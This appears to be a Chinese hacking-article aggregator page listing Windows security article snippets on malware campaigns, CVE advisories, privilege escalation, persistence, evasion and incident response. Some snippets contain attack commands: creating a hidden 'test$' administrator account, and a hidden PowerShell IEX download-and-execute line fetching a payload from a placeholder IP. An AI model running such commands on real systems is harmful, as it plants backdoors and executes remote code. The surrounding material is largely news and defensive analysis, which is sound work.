记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华走进Windows中的提权行为
前言在 《基于异常行为检测CobaltStrike》 一文里,简单提及过 CobaltStrike 的提权方式,当时受限于篇幅,没有深入研究最近看了几篇文章,结合对一些?
新的跨平台 “SysJoker” 后门同时影响 macOS、Windows、Linux
据报道,新的”SysJoker”后门可以攻击多个操作系统,包括macOS、Windows和Linux。来自Intezer的研究人员透露,他们发现了SysJoker,这个后门最初被发现是攻击Linux的。不久之后,同一后门的变种被发现,它们可以扩展出对Windows和macOS进行攻击。
这一发现是不寻常的,因为发现可以同时攻击多个平台的恶意代码是很罕见的。通常情况下,恶意软件只为攻击一个平台的特定漏洞而生成,而不是以类似的方式同时为多个平台开发。根据研究人员的技术分析,SysJoker被认为是在2021年下半年的一次攻击中启动的。
Windows HTTP协议栈远程代码执行漏洞风险通告 (已复现)
风险通告近日,奇安信CERT监测到微软官方公开并修复了Microsoft Windows HTTP 协议栈远程代码执行漏洞(CVE-2022-21907),未经身份认证的远程攻击者可通过向目标 Web 服务器发送特制的HTTP请求来利用此漏洞,从而在目标系统上执行任意代码。利用此漏洞不需要身份认证和用户交互,微软官方将其标记为蠕虫漏洞,并建议优先修补受此漏洞影响的服务器。奇安信CERT已复现此漏洞的拒绝服务场景,可导致目标主机崩溃。目前官方已发布修复补丁,鉴于此漏洞危害极大,奇安信CERT强烈建议客户尽快自查服务器的安全状况并更新补丁。
新型恶意软件SysJoker正对Windows、Linux 和macOS 操作系统构成威胁
据The Hacker News网站报道,一个名为“ SysJoker ”的新型恶意软件正对Windows、Linux 和 macOS 操作系统构成威胁,可利用跨平台后门来从事间谍活动。Intezer 研究人员宣称,他们于去年12月首次发现SysJoker,当时SysJoker 正对一家教育机构基于 Linux 的 Web 服务器发动攻击。SysJoker 采用C++ 编写,通过远程服务器的 dropper 文件传递,该文件在执行时旨在收集有关受感染主机的信息,例如 MAC 地址、用户名、物理媒体序列号和 IP 地址等。
Windows 系统提权方式汇总
在渗透测试中,提升自己的权限是经常遇到的问题,往往在渗透中最容易获取的权限就是一个webshell,如果网站是架设在Windows系统上的,这时就可能遇到这样的问题,还有一种情况是在做横向渗透的时候,收集到一些可以远程连接桌面的帐号,这是也需要,在实际的渗透中有很多的地方会需要这个操作,这个系列就主要介绍各种提权的方式。
15种windows权限维持的方法
一、影子账户1.使用如下命令创建隐藏用户并加入管理员组net user test$ 123456 /addnet localgroup administrators test$ /add创建成功后使用net user命令无法查看到此用户,但是在计算机管理页面中还是可以看到,需要通过修改注册表来隐藏。2.打开注册表(HKEY_LOCAL_MACHINESAMSAM)修改SAM权限,赋予adminitrators完全控制权限。3.将Administrator用户对应项的F数据值复制到test$用户对应项的F数据值。
发布时间:2022-01-10 12:18 |
阅读:8070 | 评论:0 |
标签:windows
Rootkit 系列研究-Windows平台的高隐匿、高持久化威胁
收录于话题 #高级持续性威胁追踪 23个 序言从西方 APT 组织的攻击历史及已经泄露的网络武器看,高隐藏、高持久化(Low&Slow)是其关键特征,而 Rootkit 则是达成此目的的重要技术之一。 在上一篇文章“【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑”里,我们介绍了Rootkit 的技术发展历程、Rootkit背后的影子以及 Rootkit 检测基本思想。
发布时间:2022-01-10 10:01 |
阅读:10375 | 评论:0 |
标签:windows
Windows内核池风水利用工具研究
引用这篇文章的目的是介绍一种基于内核态内存的越界写入通用利用技术和相关工具复现. 简介笔者的在原作者池风水利用工具(以下简称工具)基础上?
发布时间:2022-01-06 15:50 |
阅读:10115 | 评论:0 |
标签:windows
认证模式下Windows登录机制探索
2021年6月10日,《中华人民共和国数据安全法》正式颁布。数据是国家基础性战略资源,也是各金融企业的重要资源和核心竞争力。从数据泄露的途径分析,数据泄露主要分为三种:窃密,泄密和失密。在金融机构对于数据的安全越来越重视,窃密已经可以通过安全系统来做到很高等级的防护了。但是泄密和失密目前做的比较少。以企业使用最广泛的Windows终端来说,这些终端上留存着大量的企业级数据。Windows目前大部分采用用户名与密码方式登录,所以员工需要记着用户名及密码;但是很多员工为了方便,设置的密码一般都过于简单,且长期不更换密码,更有甚者将密码借予他人使用,这给安全管理工作增加了难度。
Windows 10中的 RCE漏洞:通过恶意链接发起
研究人员通过 IE11/Edge Legacy 和 MS Teams 在 Windows 10 上发现了一个驱动代码执行漏洞,该漏洞由 Windows 10/11 默认处理程序ms-officecmd: URI中的参数注入触发。通过其他浏览器进行利用需要受害者接受一个不起眼的确认对话框,或者,恶意 URI 可以通过执行不安全 URL 处理的桌面应用程序传送。利用过程代码执行由恶意网站触发,该网站执行 Javascript 重定向到精心制作的 ms-officecmd: URI(Microsoft Office UWP 应用程序用于启动其他 Office 桌面应用程序的方案)。
Windows 性能远超 Linux
以下文章来源于OSC开源社区 ,作者Travis OSC开源社区 . 开源中国,为开发者服务 文 | Travis出品 | OSC开源社区(ID:oschina2013)早在今年 8 月英特尔举办的 Architecture Day 2021 活动中,英特尔就分享过其第十二代酷睿 Alder Lake CPU 架构的核心设计细节。在 Alder Lake 中,英特尔专为 Windows 11 进行了优化,以更好地利用 Alder Lake 中所采用的 P+E 核心的混合架构和硬件线程调度技术 —— Intel Thread Director。
恶意软件 Blister 秘密潜入 Windows 系统
Hackernews 编译,转载请注明出处:
安全研究人员发现了一个恶意攻击活动,该攻击活动借助有效的代码签名证书将恶意代码伪装成合法的可执行文件。
研究人员称之为Blister的有效载荷,充当其他恶意软件的加载程序,它似乎是一种新的威胁,具有较低的检测率。
Blister背后的攻击者一直依赖多种技术来监视他们的攻击,使用代码签名证书只是他们的伎俩之一。
签名、盖章、交付
Elastic搜索公司的安全研究人员发现,自9月15日以来,无论是谁幕后操纵着Blister恶意软件,都至少已经开展了三个月的活动。
攻击者使用了8月23日起有效的代码签名证书。
windows内核之UAF(三)
0x00 UAF原理解析:释放了一个堆块后,并没有将该指针置为NULL,这样导致该指针处于悬空的状态,同样被释放的内存如果被恶意构造数据,就有可能会被重新申请这块被释放内存进而被利用。
发布时间:2021-12-24 12:16 |
阅读:12123 | 评论:0 |
标签:windows
Windows下木马隐藏小技巧
0x01 前言
当我们进行渗透测试的过程中,拿下来一台机器的权限,如果对这台主机做一个长久的控制,是我们要考虑的事情.所以通过本篇文章,我们旨在告诉
漏洞预警|Windows域服务权限提升漏洞最新分析
#威胁通报 17 个内容 #漏洞预警 13 个内容 01 漏洞概况近日,微步在线研究响应中心监测到,微软域服务权限提升漏洞细节及利用工具被公开,相关漏洞编号为:cve-2021-42287/cve-2021-42278,由于windows域服务没有对用户操作进行合理限制,使得攻击者将这两个漏洞结合起来能实现从域内普通用户到域管理的权限提升。
Obsidian XSS分析
写在前面
版本:v0.12.19
官网地址:https://obsidian.md/
测试环境:Windows
首先我们新建一个笔记
我们在笔记当中写入:
<iframe src=http://127.0.0.1></iframe>
我们可以看到在iframe标签中有一个src地址。
我们接下来在本地服务器中新建一个HTML页面,在里面。
Windows 注册表中隐藏的 DarkWatchman 恶意软件
Hackernews 编译,转载请注明出处:
一种名为“DarkWatchman”的新恶意软件出现在地下网络犯罪组织中,它是一种轻量级、功能强大的 JavaScript RAT(远程访木马),与C#键盘记录器配对。
根据 Prevailion 研究人员的一份技术报告,这种新型 RAT 是由讲俄语的攻击者部署的,他们的目标主要是俄罗斯的组织。
在11月初发现了DarkWatchman的第一次踪迹,当时攻击者开始通过带有恶意ZIP附件的网络钓鱼电子邮件传播恶意软件。
这些ZIP文件附件包含一个使用图标模拟文本文档的可执行文件。
新的无文件恶意软件使用Windows注册表来逃避检测
新的无文件恶意软件使用Windows注册表来逃避检测 已经观察到一种新的基于JavaScript的远程访问木马(RAT)通过社会工程活动传播,采用偷偷摸摸的"无文件"技术作为其检测规避方法的一部分,以逃避发现和分析。该恶意软件由Prevalyion的对抗性反情报团队(PACT)的研究人员称为DarkWatchman,它使用弹性域生成算法(DGA)来识别其命令和控制(C2)基础架构,并利用Windows注册表进行所有存储操作,从而使其能够绕过反恶意软件引擎。
Windows Active Directory 域服务权限提升漏洞通告
阅读:5一、漏洞概述12月13日,绿盟科技CERT监测发现有研究人员公开了Active Directory Domain Services权限提升漏洞(CVE-2021-42287、CVE-2021-42278)的 PoC。微软官方已在11月的安全更新发布了以上漏洞的修复补丁,请相关用户尽快采取措施进行防护。CVE-2021-42287(CVSS 3.0评分8.8):由于Active Directory没有对域中计算器与服务器账号名进行验证,经过身份验证的远程攻击者利用该漏洞绕过安全限制,可将域中普通用户权限提升为域管理员权限并执行任意代码。
漏洞预警 | Windows域服务权限提升漏洞细节及利用工具被公开
#威胁通报 12 个内容 #漏洞预警 8 个内容 01 漏洞概况 近日,微步在线研究响应中心监测到,微软域服务权限提升漏洞细节及利用工具被公开,相关漏洞编号为:CVE-2021-42287/CVE-2021-42278。由于 Windows 域服务没有对用户操作进行合理限制,使得攻击者将这两个漏洞结合起来能实现从域内普通用户到域管理的权限提升。
每周下载数百万次!恶意软件包感染Linux和Windows设备引发供应链攻击
开源软件公司Sonatype的研究人员发现了多个恶意软件包,这些软件包将自己伪装成 npm注册表中的合法JavaScript库,以在Windows、macOS和Linux机器上启动加密矿工。 npm注册表是JavaScript包的数据库,包括开源开发人员用来支持JavaScript代码共享的软件和元数据。 黑客劫持了流行的UA-Parser-JS NPM库,这些库每周下载数百万次,在供应链攻击中使用加密矿工和密码窃取木马感染 Linux 和 Windows设备。 UA-Parser-JS库用于解析浏览器的用户代理以识别访问者的浏览器、引擎、操作系统、CPU和设备类型/型号。
六方云诚聘渗透测试、漏洞挖掘、威胁情报、安全服务等岗位人才
公司介绍
六方云是一家技术领先的“新安全”公司,率先提出了“AI基因、威胁免疫”的安全理念,成为国内第一家将人工智能主动式防御技术成功应用在工业互联网安全领域的创新黑马企业。六方云拥有AI安全、工控安全、OT与IT融合安全、云内微隔离/零信任的四大核心技术,均达到业界领先水平,同时逐渐形成了“5+1”产品线和基于AI安全技术的纵深防御解决方案、安全服务,能够帮助工业和政企客户建立主动安全防护体系,为国家关键信息基础设施安全保驾护航。
windows命令执行防御规避总结
powershellpowershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx:8888/logo.gif'))"" /fSIP通过sip劫持对恶意代码签名获得系统?
应急事件检测 入门篇-windows信息检测
目标:通过数据分析确定攻击事件、查找攻击线索、梳理攻击流程、在可能的情况下,溯源到对方。数据分析技术—系统信息分析 01 windows用户信息收集系统用户:1.lusrmgr.msc //查找本地用户和组2.net user// 查找用户3.net localgroup administrators 查找本地管理员组用户4.Get-LocalUser 使用powershel 查找用户。 02windows系统进程信息收集1.使用taskmgr.exe工具进行收集。
发布时间:2021-12-08 13:05 |
阅读:15974 | 评论:0 |
标签:windows
恶意KMSPico Windows激活器窃取用户的加密货币钱包
恶意KMSPico Windows激活器窃取用户的加密货币钱包 希望在不使用数字许可证或产品密钥的情况下激活Windows的用户正在成为受污染的安装程序的目标,以部署旨在掠夺加密货币钱包中凭据和其他信息的恶意软件。这种被称为"CryptBot"的恶意软件是一种信息窃取者,能够获取浏览器,加密货币钱包,浏览器cookie,信用卡的凭据,并从受感染的系统捕获屏幕截图。通过破解软件部署,最新的攻击涉及伪装成KMSPico的恶意软件。
白嫖党小心了,热门Windows激活软件KMSPico被植入恶意程序
据The Hacker News网站报道,一种名为CryptBot的恶意程序正伪装成时下热门的Windows系统第三方激活工具——KMSPico。CryptBot是一种信息窃取程序,能够获取浏览器cookie、加密货币钱包、信用卡凭证,并从受感染的系统中捕获屏幕截图。研究人员分析发现,该恶意程序由CypherIT 打包程序进行包装,可混淆安装程序以防止其被安全软件检测到。然后,此安装程序会启动一个同样经过严重混淆的脚本,该脚本能够检测沙箱和 AV仿真,因此在研究人员的设备上运行时不会执行。
调试Windows服务
阅读:13一、调试Windows服务知识点汇总若服务源码是自己开发的,可在被调试代码逻辑中主动调用DebugBreak(),以此呼叫”Just-In-Time Debugging”;也可通过命令行参数让被调试代码逻辑以普通控制台进程方式运行,这种没法调试SCM相关的代码。一般调试Windows服务,并非服务源码可控的情形。通常分两种情况,一种是被调试代码逻辑可以在Attach之后触发,一种是被调试代码逻辑只在服务启动时触发。第一种情况和普通调试一样,第二种情况相对复杂些,要做些特别设置。以前没有过第二种需求,只知道大概思路,未实践过。
自动化地分析 Windows 系统缺失的补丁及对应的漏洞情况(下)
Windows Exploit SuggesterWES-NG 的 wes.py 脚本是一个 Python 2/3 工具,它使用漏洞利用定义文件并根据操作系统版本和已安装的补丁列表检查缺少的补丁。 WES-NG 随后自动迭代被替换的补丁链。要开始使用 wes.py,首先需要使用 --update(简写:-u)参数下载最新的定义文件,该参数会将最新的 definition.zip 文件下载到当前目录。接下来,可以使用先前提取的 systeminfo.txt 文件和可选的 qfe.txt 文件执行 wes.py,并将已安装的 KB 列表作为参数。
资源占用降低50% 奇安信安全防护软件冬奥版率先适配Windows11
7月8日,奇安信安全防护软件冬奥版已经率先完成了和Windows11系统的适配工作,并上线多项功能。对此,奇安信集团副总裁张庭表示,自4月29日开启内测以来,经过广大用户两个多月的内测体验,奇安信安全防护软件冬奥版在功能、性能等方面均有大幅度提升。 作为奇安信首款面向个人用户的安全防护产品,奇安信安全防护软件冬奥版不仅保留了奇安信天擎业界领先的强安全能力,还重点强化了个人终端关注的隐私保护、卡慢追踪、网络连接管理、攻击溯源、无广告打扰等功能。 据介绍,围绕个人终端的场景和需求,本次版本更新加入了许多有趣的功能。
自动化分析 Windows 系统缺失的补丁及对应的漏洞情况(上)
经常有很多人问我“我知道 Windows 系统上安装了哪些补丁 (KB),但我怎么知道它面临哪些风险?”。这是一个很好的问题,我相信还有更多的人有同样的疑问。挑战在于,通过简单地查看已安装 KB 的列表,并没有简单的方法来了解系统暴露的漏洞是什么。我们会在本文介绍 Windows 版本控制的工作原理,然后完成从本地或远程系统获取 Windows 版本信息和已安装 KB 列表的步骤。有了这些信息,我们就能够快速识别他们正在攻击的系统的漏洞,并在可用时使用漏洞来扩展他们的立足点。这将帮助我们快速评估系统面临的风险。wes.py 和 missingkbs.vbs 将尽可能有效地支持识别过程。
公告
❤永久免费、持续更新、精选优质黑客技术文章的Hackdig,帮你成为掌握黑客技术的英雄❤
